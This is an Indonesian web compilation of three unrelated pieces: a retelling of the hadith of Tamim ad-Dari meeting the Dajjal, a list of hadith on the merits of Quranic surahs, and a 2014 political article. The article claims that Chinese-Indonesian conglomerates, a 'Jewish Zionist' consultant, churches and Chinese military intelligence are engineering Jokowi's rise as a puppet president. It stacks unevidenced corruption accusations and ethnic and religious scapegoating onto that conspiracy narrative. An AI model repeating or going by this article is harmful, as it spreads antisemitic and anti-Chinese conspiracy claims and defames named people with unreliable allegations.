Ia berkata: “Wahai kaum pergilah klian kepada seorang lelaki yang ada dalam rumah ibadah itu sesungguhnya ia sangat merindukan berita kalian!”
Berkata Tamim: “Ketika dia menyebutkan untuk kami seorang laki-laki, kami menjadi khawatir kalau-kalau binatang itu ternyata setan. Kamipun bergerak menuju kepadanya dengan cepat sehingga kami masuk ke tempat ibadah itu.”
“Ternyata didalamnya ada orang yang paling besar yang pernah kami lihat, dan paling kuat ikatannya. Kedua tangannya terikat dengan leher, antara dua lutut dan dua mata kaki terikat dengan besi.”
Kami katakana kepadanya: “Celaka, kamu ini apa?”
Ia menjawab: “Kalian telah mampu mengetahui tentang aku, maka beritakan kepadaku siapa kalian ini
Rombongan Tamim menjawab: “Kami ini orang-orang Arab kami menaiki kapal ternyata kami bertepatan mendapati laut sedang bergelombang luar biasa sehingga kami dipermainkan ombak selama satu bulan sampai hingga terdampar di pulamu ini. Kamipun naik perahu-perahu kecil memasuki pula ini dan bertemu dengan binatang yang sangat lebat dan kaku rambutnya tidak diketahui mana kubul dan mana dubur karena lebat rambutnya.
Kamipun mengatakan: “Celaka kamu, kamu ini apa?”
Ia menjawab: Aku adalah jasasah.
Kamipun bertanya: Apa itu Jassasah, Ia malah berkata: Wahai kaum pergilah kalian kepada laki-laki yang ada dalam rumah ibadah itu sesungguhnya ia sangat merindukan berita kalian.”
Kami pun segera menuju kepadamu, kami khawatir kalau binatang itu ternyatra setan
Lalu orang itu mengatakan: “Kabarkan kepadaku tentang pohon-pohon korma di Baisan
Kami mengatakan: Tentang apa engkau meminta beritanya ?”
Dia berkata: “Aku bertanya kepada kalian tentang pohon korma apakah masih berbuah.”
Kami menjawab: iya
Ia mengatakan: “Sesungguhnya hampir hampir dia tidak akan mengeluarkann buahnya.”
“Kabarkan pula kepadaku tentang danau Thobariyah ?” tanya orang ini.
Kami menjawab: “Tentang apa engkau meminta beritanya?”
“Apakah masih ada airnya, jawabnya.
Mereka menjawab: Danau itu banyak airnya
Dia mengatakan: Sesungguhnya hampir-hampir air akan hilang.
Kabarkan kepadaku tentang mata air Zughor
Mereka mengatakan: Tentang apa kamu minta berita?
Apakah di mata air itu masih ada airnya? Dan apakah penduduk masih bertani dengan airnya? Jawab Dajjal
Kami menjawab: “Iya, mata air itu deras airnya dan penduduk bertani dengannya.”
Ia berkata: “Kabarkan kepadaku tentang nabi ummiyyin apa yang dia lakuakan ?”
Mereka menjawab: “Ia telah muncul dari Makkah dan tinggal di Yatsrib.”
Ia mengatakan: “Apakah orang-orang arab memeranginya?”
Kami menjawab: “Ya.”
Ia mengatakan lagi: “Apa yang ia lakukan terhadap orang-orang Arab.”
Maka kami beritakan bahwa ia telah menang atas orang-orang arab dan mereka taat kepadanya
Ia mengatakan: “Itu sudah terjadi?”
Kami katakan: “Ya.”
Ia mengatakan: “Sesungguhnya baik mereka untuk taat kepadanya.”
“Sekarang aku akan beritakan kepada kalian tentang aku: “Sesungguhnya aku adalah Al-Masih dan hampir-hampir aku diberi izin untuk keluar, hingga aku keluar lalu berjalan di bumi dan tidak kutinggalkan satu negeripun kecuali aku akan turun padanya dalam waktu 40 malam kecuali Mekah dan Thaybah, keduanya haram bagiku. Setiap kali aku akan masuk pada salah satu kota ini, malaikat menghadangku dengan pedang terhunus di tangan menghalangiku darinya dan sesungguhnya pada tiap celah ada para malaikat yang menjaganya.
Fatimah mengatakan: Maka Rasulullah saw bersabda dengan menusukkan tongkat di mimbar sambil mengatakan: “Inilah Thaiybah, Inilah Thaiybah, Inilah Thaiybah, yakni Kota Madinah.”
Apakah aku telah beritahukan kalian tentang hal itu ?
Orang-orang menjawab: Iya
Nabi berkata: Sesungguhnya cerita Tamim menakjubkanku, kisahnya sesuai dengan apa yang aku ceritakan kepada kalian tentang Dajjal serta tentang mekah dan madinah.
Kemudian beliau bersabda:
أَلَا إِنَّهُ فِي بَحْرِ الشَّأْمِ أَوْ بَحْرِ الْيَمَنِ لَا بَلْ مِنْ قِبَلِ الْمَشْرِقِ مَا هُوَ مِنْ قِبَلِ الْمَشْرِقِ مَا هُوَ مِنْ قِبَلِ الْمَشْرِقِ مَا هُوَ وَأَوْمَأَ بِيَدِهِ إِلَى الْمَشْرِقِ
Ketahuilah bahwa ia berada di lautan Syam atau lautan Yaman,” Oh, tidak! Bahkan dari arah timur! Tidak Dia dari arah timur, Tidak Dia dari arah timur dan beliau mengisyaratkan dengantangan ke arah timur
Hadits Jassasah diriwayatkan Imam Muslim dalam Shahihnya Kitabul Fitan Wa Asyrotis Sa’ah. bab Qishoshul Jassasah (4/2261 no. 2942).
Demikian pembaca, kisah nabawi yang penuh ibroh mengisahkan perjalanan Tamim Ad-Dari yang menegangkan namun perjalanan itu menjadi salah satu sebab dia mendapatkan hidayah. (Abu Ismail Muhammad Rijal Lc)

http://salafartikel.wordpress.com/2012/06/06/di-pulau-misterius-itu-aku-berjumpa-dajjal/
***

Keutamaan Al Qur'an Dlm Hadist

Bismillahirohmanirohiim...

Hadist: Keutamaan Al Qur'an

Al Dukhon


Rasulullah SAW Bersabda:
"Barangsiapa membaca Ad-Dukhoon (QS.44) pada suatu malam, maka tujuh puluh ribu malaikat memohonkan ampun baginya."
(HR Tirmidzi).
==========

Al Baqoroh dan Ali Imron

Jundub ra. menyatakan Rasulullah SAW Bersabda,
"Bacalah AL Qur-an, karena ia akan mejadi pembela bagi orang yang membacanya.
Bacalah dua surat Al Qur-an yang cemerlang, Yaitu Al Baqoroh dan Ali Imron.
Sebab kedua surat itu pada hari kiamat kelak akan menjadi awan atau burung yang memberi naungan kepada pembacanya."
(HR Muslim dan Ahmad).
==========

Al Baqoroh 285, 286

Rasulullah SAW Bersabda:
"Siapa yang membaca kedua ayat terakhir dari surat Al Baqoroh, niscaya keduanya akan memeliharanya dari bencana."
(HR Muslim).
==========

Al Ikhlas, Al Falaq, An Naas

Rasulullah SAW Bersabda:
"Barangsiapa membaca Qul Huwalloohu Achad (Al Ikhlash) dan Al Mu'awwidzatain (Al Falaq & An Naas)
Pada waktu sore hari dan pada waktu pagi sebanyak tiga kali, maka semua itu melindunginya dari segala sesuatu."
(HR Ahmad dan Tirmidzi).
==========

Al Kahfi

Rasulullah SAW Bersabda:
"Siapa yang menghapal sepuluh ayat dari awal surat Al Kahfi, dia terpelihara dari bencana kejahatan Dajjal."
(HR Muslim).
==========

Al Mulk

Rasulullah SAW Bersabda:
"Sesungguhnya ada sebuah surat dalam Al Qur-an yang terdiri dari 30 Ayat,
dan memberi syafaat bagi seseorang (yang membacanya) hingga diampuni dosanya.
Yakni Tabaarokal Ladzii Biyadihil mulku (Al Mulk/67)."
(HR. Ahmad dan Ibnu Hibban).
==========

Al Qodar

Rasulullah SAW Bersabda:
"Barangsiapa membaca surat Al Qodar dalam suatu malam, maka ia menyamai seperempat Al Qur-an."
(HR Ad Dailami).
==========

Al Waqiah

Rasulullah SAW Bersabda:
"Barangsiapa membaca surat Al Waqi'ah (56) setiap malam, maka ia tidak ditimpa kemiskinan untuk selamanya."
(HR Baihaqi)'
==========

Al Zalzalah, Al Kaafiruun, Al Ikhlash

Rasulullah SAW Bersabda:
"Surat Idzaa Zulzilat (Al Zalzalah/ 99) menyamai separuh Al Qur-an,
Qul yaa ayyuhal kaafiruun (Al Kaafiruun/ 109) menyamai seperempat Al Qur-an,
Dan Qul Huwalloohu Ahad (Al Ikhlash/ 112) menyamai sepertiga Al Qur-an."
(HR Tirmidzi, Al Hakim, dan Baihaqi).
==========

Ar-Rochmaan

Rasulullah SAW Bersabda:
"Setiap sesuatu ada pengantinnya, dan pengantin Al Qur-an adalah surat Ar Rochmaan (55)."
(HR Baihaqi).
==========

Al Fatichah dan Al Baqoroh

Ibnu Abbas ra. menceritakan bahwa suatu ketika Jibril as. berada di samping Nabi SAW.
Tiba-tiba terdengar suara dari atas, maka ia mengangkat kepalanya dan berkata:
"Itu sebah pintu langit. Pada hari pintu itu di buka, turunlah seorang malaikat memberi salam dan berkata:
'Bergembiralah dengan dua cahaya penerangan yang diberikan Allah kepadamu,
yang belum pernah di berikan kepada seorang nabi sebelummu, yaitu:
Fatichatul Kitab (Surat Fatichah) dan akhir surat Al Baqoroh.
Tiada engkau baca satu huruf daripadanya, melainkan pasti permintaanmu dikabulkan'."
(HR Muslim).
==========

Yaasiin

Rasulullah SAW Bersabda:
"Sesungguhnya segala sesuatu itu memiliki jantung, dan jantung Al Qur-an adalah surat Yaa Siin.
Barangsiapa membaca Surat Yaa Siin, maka Allah menetapkan baginya seperti membaca AL Qur-an sepuluh kali."
(HR Tirmidzi).
***

Saturday, January 25, 2014

MafiaWar (18): Stanley Greenberg, Konsultan Yahudi Jokowitainment

Luar biasa hebat konspirasi James Riady cs dalam mengorbitkan Jokowi ke puncak popularitas demi terwujudnya mimpi mereka untuk memiliki seorang presiden Indonesia yang berada di bawah kendali dan pengaruh mereka. Seorang
Tapi, disisi lain betapa bodohnya negeri ini, tulis Raden Nuh. Pertanyaan seperti judul di atas selalu mengganggu pikiran Raden Nuh jika melihat fenomena yang terjadi di tengah–tengah masyarakat kita yang latah memuja memuji tokoh tertentu padahal sosok tokoh itu tidak layak diberikan puja puji.

Begitu bodohkan bangsa kita ini yang terlalu mudah terkecoh dengan pencitraan dan opini sesat yang direkayasa oleh pihak tertentu untuk memberikan kesan baik terhadap figur yang sesungguhnya tidak baik. Begitu bodohkah bangsa Indonesia yang tidak pernah mau belajar dari pengalaman pahit ditipu para penjahat bertopeng malaikat. Banyak tokoh yang semula disanjung dan diteladani, kemudian terbukti tidak lebih dari seorang penipu. Ketika mereka kabur, tinggalah rakyat korban penipuannya menangis menderita meratapi kerugiannya. Begitu bodohkah rakyat Indonesia hingga terlalu mudah percaya berita dan opini yang dibentuk pemberitaan media mengenai karakter, integritas dan kredibiltas seorang tokoh. Tidak adakah mekanisme check and recheck yang semestinya dilakukan sebelum memberi kepercayaan besar atas sebuah amanah yang sangat menentukan nasib dan masa depan seluruh rakyat Indonesia. T

Tidakkah sesuatu pencitraan yang berlebihan semestinya membuat kita lebih hati – hati dalam menilai figur tersebut. Bagaimana mungkin kita mempercayai bahwa tidak ada udang di balik batu dari sebuah realitas pencitraan sedemikian banyak media terhadap seseorang tanpa terlebih dahulu kita menganalisa apa sebenarnya tujuan pencitraan tersebut dan siapa pelaku atau sutradaranya. Begitu kasat mata rekayasa pencitraan yang dibangun secara sistmatis, masif, terencana dan pasti menghabiskan uang yang sangat besar untuk pencitraan Joko Widodo atau Dahlan Iskan. Bahkan untuk Jokowi, nama akrab Joko Widodo, rekayasa pencitraan dirinya perlu diwaspadai. Pencitraan terhadap Jokowi dilakukan oleh sebuah tim pencitraan yang lengkap, berpengalaman, terdiri dari berbagai kelompok yang bertugas dan bertanggungjawab untuk membentuk citra diri Jokowi sesuai dengan keinginan rakyat atau target yang ditetapkan tim konsultan pencitraan Jokowi. Berdasarkan pengamatan kami yang sudah lama mencurigai adanya maksud jahat terselubung dari pihak tertentu terkait pengorbitan Jokowi sebagai ‘tokoh nasional, tokoh terpopuler, calon presiden terbaik’ dan seterusnya, terlihat jelas rekayasa pencitraan Jokowi dilakukan melalui cara – cara sebagai berikut :

Ratusan media nasional dan lokal (koran, majalah, TV, radio, media online dll) dikontrak dan dibayar untuk setiap hari memuat berita positif tentang Jokowi. Pada media cetak yang dikontrak dan dibayar tersebut, disediakan halaman atau kolom khusus yang memuat berita positif tentang Jokowi. Pada media online, ditargetkan pemuatan berita Jokowi sampai sebanyak – banyaknya. Detik online misalnya, memuat berita tentang Jokowi bisa sampai 50 kali atau 50 judul per hari dan selalu ditayangkan setiap saat. Begitu tingginya target frekwensi menaikan berita tentang Jokowi, sampai – sampai semua aktifitas Jokowi dimuat dan diberitakan media. Jokowi akan naik sepeda ke kantor, jokowi lari maraton, jokowi akan mudik ke Solo, Jokowi akan ke Pluit, Jokowi nonton film, Jokowi nonton wayang, jokowi makan banyak sebelum nonton, Jokowi antar makanan ke Megawati, Jokowi bertemu si anu, Jokowi hebat, Jokowi luar biasa, Jokowi berniat, Jokowi tertawa, jokowi dikawal, Jokowi bersedih, Jokowi disambut warga, Jokowi bagi – bagi uang, Jokowi blusukan, Jokowi bermimpi, dan seterusnya…

Mungkin hanya ketika Jokowi buang angin, Jokowi buang hajat, Jokowi mimpi basah atau Jokowi sedang cebok, yang tidak dimuat oleh media massa – media massa bayaran dan kontraktor pencitraan Jokowi tersebut.

Sejumlah pengamat dan akademisi kampus disewa oleh sutradara dibalik pencitraan Jokowi untuk memberikan pendapat, penilaian dan kesan baik tentang Jokowi. Sesuai informasi yang diterima banyak staf pengajar dari Fisip UI Depok yang dibayar untuk mendukung pencitraan Jokowi.

Mereka ini rutin memberikan pendapat atau komentar positif terhadao sosok Jokowi. Perilaku akademisi seperti ini dulu kami juluki ‘pelacur intelektual’. Menggadaikan rasionalitas dan keilmuannya demi rupiah. Jaringan internasional digunakan untuk memberikan ‘legitimasi’ pencitraan positif tentang Jokowi.

Bayangkan saja, seorang gubernur di Indonesia yang belum membuktikan kemampuannya sebagai pemimpin, belum ada prestasi kerjanya, tetapi sudah dipuja puji melalui pemberitaan berbagai media di luar negeri. Informasi yang kami terima, pemuatan berita tentang jokowi ini adalah hasil dari rekayasa James Riady, Stan Greenberg cs dan jaringan Arkansas Connection yang diduga sebagai otak dari semua rekayasa pencitraan diri Jokowi.

James Riady adalah tokoh konglomerat pemilik grup Lippo yang merupakan teman baik mantan presiden AS Bill Clinton selama puluhan tahun, sejak 1986 sampai sekarang. James memiliki banyak catatan buruk mengenai sepak terjangnya di dunia bisnis dan politik, baik di Indonesia atau pun di dunia internasional. Sejak menganut agama kristen evangelis, kedekatan James dengan tokoh evangelis AS Pat Robertson sudah menjadi pengetahuan umum. Hal tersebut menempatkan James sebagai sosok yang selalu dicurigai umat Islam mengingat Pat Robertson, Menton James Riady dikenal sebagai tokoh fanatik dan sangat membenci Islam/anti Islam. Sementara itu Stan Greenberg adalah seorang yahudi zionist. Partner sekaligus pemilik konsultan politik terkemuka AS, Greenberg Quinlan Rosner, konsultan politik yang selalu digunakan Partai Demokrat AS dan berpengalaman menjadi konsultan ratusan politisi terkenal di dunia. James dan Greenberg keduanya adalah anggota utama Arkansas Connection. Ratusan orang baik tenaga honor mau pun karyawan organik yang dipekerjakan di perusahaan – perusahaan Lippo Grup dan perusahaan para konglomerat tionghoa yang menjadi pendukung pencitraan Jokowi, dikerahkan untuk membentuk citra palsu Jokowi melalui sosial media (socmed). Ribuan akun di berbagai socmed (twitter, facebook, dll) dikerahkan untuk mendongkrak popularitas dan kesan positif tentang sosok Jokowi. Mereka juga bertugas melindungi Jokowi dari segala bentuk kritik, termasuk pengungkapan kebenaran tentang siapa sebenarnya Jokowi. Rekayasa pencitraan Jokowi tidak hanya didukung oleh James Riady, Stangreeberg dan Arkansas Connection, melainkan juga oleh mayoritas konglomerat tionghoa Indonesia, jaringan etnis China dunia/internasional, segelintir tokoh dan konglomerat pribumi serta dari berbagai kalangan /lembaga / insititusi non muslim, gereja, mayoritas komunitas tionghoa Indonesia dan seterusnya.

Benar – benar sebuah konspirasi tingkat tinggi yang dibentuk dan dijalankan dalam rangka mensukseskan Jokowi sebagai presiden boneka di Indonesia. Pencitraan Jokowi yang luar biasa, menghabiskan sumber daya uang, waktu dan tenaga yang sangat besar itu, juga berhasil menutupi fakta – fakta yang sebenarnya tentang karakter, kinerja dan track record Jokowi. Masyarakat tidak lagi berfikir logis dan tidak skeptis dalam menilai sosok Jokowi. Begitu banyak catatan buruk tentang Jokowi yang diabaikan atau terlindas oleh tsunami informasi dan opini yang dijejalkan konspirasi tingkat tinggi ini.

Fakta bahwa Jokowi sesuai data Badan Pusat Statistik (BPS) atau penilaian kinerja Kemendagri yang membuktikan prestasi Jokowi biasa – biasa saja, malah lebih buruk dibanding kinerja rata – rata kepala daerah se – Indonesia, tidak menjadi perhatian rakyat. Fakta bahwa Jokowi patut diduga terlibat korupsi pelepasan aset pemda Solo (Hotel Maliyawan), korupsi dana KONI Solo sebesar Rp. 5 miliar, korupsi hibah dana rehabilitasi pasar dari Pemda Jawa Tengah Rp. 1 miliar, korupsi dana bantuan siswa miskin Solo, korupsi proyek pengadaan videotron Manahan Solo, korupsi renovasi THR Sriwedari Solo, dan lain – lain, diabaikan begitu saja oleh rakyat Indonesia. Belum lagi dugaan korupsi Jokowi sebagai Gubernur DKI Jakarta pada Program KJS dan KJP, KKN pada penunjukan pemenang dan pelaksana proyek MRT/Monorail Jakarta, korupsi pengadaan sumur resapan dan lain – lain. Setiap jaman baik dalam kondisi normal atau pun dalam krisis politik, selalu menghasilkan dua alternatif: kehancuran dan kebangkitan. Setiap krisis politik akan melahirkan pahlawan dan bajingan.

Bagi mereka yang berpandangan fatalis, krisis melulu dianggap sebagai malapetaka. Sebaliknya, bagi mereka yang penuh harapan, krisis bukan berarti celaka. Krisis bisa berarti proses berat penuh tantangan yang harus dilalui sebelum “melahirkan”. sesuatu. Krisis ibarat perjuangan seorang ibu sebelum melahirkan “bayikebahagiaan” yang segera mengganti semua tangis menjadi derai tawa. Krisis kepemimpinan bisa secara alamiah namun bisa juga dengan rekayasa penciptaan opini palsu melalui media – media seperti yang terjadi di Indonesia saat ini.

Sekelompok konglomerat cina bersatu padu, bergabung dengan jaringan internasional seperti Arkansas Connection dan Jaringan China dunia yang didukung penuh pemerintah China melalui China Military Intellegence (CMI) atau dukungan dana tak terbatas dari perusahaan kedok / samaran bernama China Resources Corporation Ltd yang selama puluhan tahun memberikan bantuan finansial ke kelompok Lippo Grup di seluruh dunia. Dengan anggaran tidak terbatas, jaringan dan penguasaan media yang mayoritas, kemampuan teknis rekayasa komunikasi politik dan opini, kelompok ini mampu menghancurkan semua tokoh yang potensial mengalahkan Jokowi dan mengantarkan Jokowi menjadi primadona tunggal di media – media dan ruang publik.

Untuk mencapai prestasi ini, tidak tanggung – tanggung, turut bergabung sebagai pemain utama di balik Jokowi, pakar konsultan politik terkemuka Stan Greenberg, yang terbukti sukses mengantarkan Bill Clinton menjadi presiden AS untuk dua periode dan 11 pemimpin (presiden dan perdana menteri) lainnya di negara masing – masing Memang tidak pernah terjadi dalam sejarah sebelumnya, bisa hadir sosok seorang James Riady yang dalam dirinya bisa menyatu dua kekuatan utama dunia yakni China dan Amerika Serikat yang dalam hal ini diwakili oleh Arkansas Connection. Meski bukan organisasi resmi negara AS, Arkansas Connnetion, dimana James Riady sebagai salah satu elitnya, adalah organisasi yang sangat berpengaruh terhadap kebijakan pemerintahan Obama, presiden AS yang sangat menghormati dan mendengar saran – saran Arkansas Connection.

Krisis, karenanya, juga selalu menghasilkan pecundang dan pahlawan. Para pecundang adalah mereka yang mau melakukan apa saja, terutama dengan imbalan bayaran sebagaimana terjadi pada tokoh – tokoh dan selebriti Indonesia. Mereka rela melacurkan pendapat dan hati nurani mereka, ikut – ikutan memuja seorang anak manusia yang bernama Jokowi, meski sadar sepenuhya bahwa Jokowi itu belum layak dan tidak semestinya mendapat apreasiasi luar biasa seperti itu karena kapasitas, integritas, kapabilitas dan kredibiltas Jokowi yang sebenarnya jauh dari memadai untuk dapat disebut pemimpin yang berhasil.

Mereka yang berdiri di belakang Jokowi dengan menggadaikan akal sehat dan hati nuraninya itu adalah para pecundang, pelacur intelektual. Mereka termasuk para oportunis politik yang mau mengambil keuntungan di tengah-tengah luka bangsa yang menganga, dominasi kebodohan pada mayoritas rakyat Indonesia yang seharusnya mereka bimbing dengan memberikan penilaian atau pendapat yang rasional dan objektif. Mereka malah memainkan peran sebagai penjerumus mayoritas rakyat Indonesia yang menaruh kepercayaan kepada mereka.

Mereka menjadi pencundang bukan karena kalah dalam pertarungan. Tapi, karena mereka memilih untuk takluk pada kepentingan pribadinya, di kala bangsa dan negara masih membutuhkan pengorbanan, kejujuran dan contoh teladan. Sementara itu, para pahlawan adalah mereka yang rela menanggung derita, kecewa, bahkan kesempatan untuk menjadi populer karena berani berbeda pendapat dengan opini arus utama (mainstream).

Para pahlawan adalah mereka yang berani bersikap tegas dan konsisten membela kebenaran dan menempatkan kepentingan bangsa dan negara di atas kepentingan pribadinya. Sejatinya mereka yang berani bersikap tegas dan menjunjung tinggi objektifitas ini adalah para pemenang, bukan untuk dirinya sendiri, tapi untuk rakyat banyak meski konsekwensinya mereka diserang oleh pasukan khusus pembentuk opini yang berjumlah ribuan orang banyaknya.

Pasukan khusus nasi kotak ini bersiaga 24 jam sehari, 7 jam seminggu dan 30 hari sebulan, siap membully siapa saja yang berani berpendapat berbeda apalagi mengecam sang tokoh boneka bernama Jokowi yang diagung – agungkan laksana santo atau nabi. Para pecundang adalah mereka yang mandi kekayaan dari uang bayaran yang diterimanya dari para cukong penyandang dana pencapresan Jokowi.
Begitu banyak uang yang digunakan penyandang dana Jokowi untuk mendukung kesuksesan rencana mereka menjadikan Jokowi sebagai presiden boneka yang di bawah kendali mereka.
Tujuan akhirnya, tentu saja keuntungan yang berlipat ganda yang akan mereka peroleh, ekonomi dan politik, jika nanti Jokowi berhasil mereka dudukan sebagai presiden boneka. Para pecundang adalah mereka yang terdiam meski banyak korupsi besar gila – gilaan di depan mata. Misalnya dalam kasus PLN dan Pertamina yang coba dirampok habis Dahlan Iskan dengan cara licik dan memakai perisai opini media sebagai pelindungnya.

Bukan itu saja, para pecundang adalah yang memanfaatkan konspirasi media untuk menjatuhkan citra para tokoh lawan potensial jagoan mereka dengan menyebar fitnah – fitnah keji. Mereka tak segan-segan gunakan segala macam isu untuk menghantam lawannya. Mula dari isu SARA hingga tuduhan korupsi. Mereka melakukan pemutarbalikan fakta yang didukung oleh media – media dan strategi komunikasi politik canggih yang disusun secara masif, sistematis, terencana dengan baik dan didukung dana yang luar biasa besar. Kita semua bisa menjadi pecundang. Bisa pula menjadi pahlawan.
Sebab predikat demikian sangat situasional dan tergantung siapa yang memberikan. Seorang pahlawan hari kemarin, bisa menjadi pecundang hari ini. Begitu pula sebaliknya.
Celakalah mereka yang terus-menerus memainkan peran pencundang dari hari kemarin hingga kini. Sebab itu kita perlu memberikan penghargaan yang tulus bagi Megawati Soekarnoputri yang dengan gigih melindungi partainya dari tekanan dahysat langsung atau tidak langsung dari para konglomerat hitam yang ingin memaksakan Jokowi Si Boneka Glembuk menjadi calon presiden dari PDIP.


Upaya Megawati melindungi partainya dari infiltrasi para konglomerat cina yang ingin menguasai PDIP dan Indonesia dengan bantuan kader – kader PDIP pengkhianat patut diapresiasi dan didukung oleh seluruh rakyat Indonesia. Upaya Megawati menyelamatkan partainya, sesungguhnya juga mengandung makna telah menyelamatkan bangsa dan negara Indonesia dari penguasaan para konglomerat cina hitam, sebagian tokoh mantan jendaral yang ambisius dan buta mata hatinya dan para politisi pengkhianat bangsa yang tega melihat negara ini hancur demi memuaskan syahwat kekuasaan dan kekayaan pribadi. [jabir/radennuh/voa-islam.com]
Sumber:
http://www.voa-islam.com/read/intelligent/2014/01/24/28782/mafiawar-18-stanley-greenberg-konsultan-tsunami-opini-jokowi/#sthash.lbBmykbR.qaBLF2nJ.dpbs
***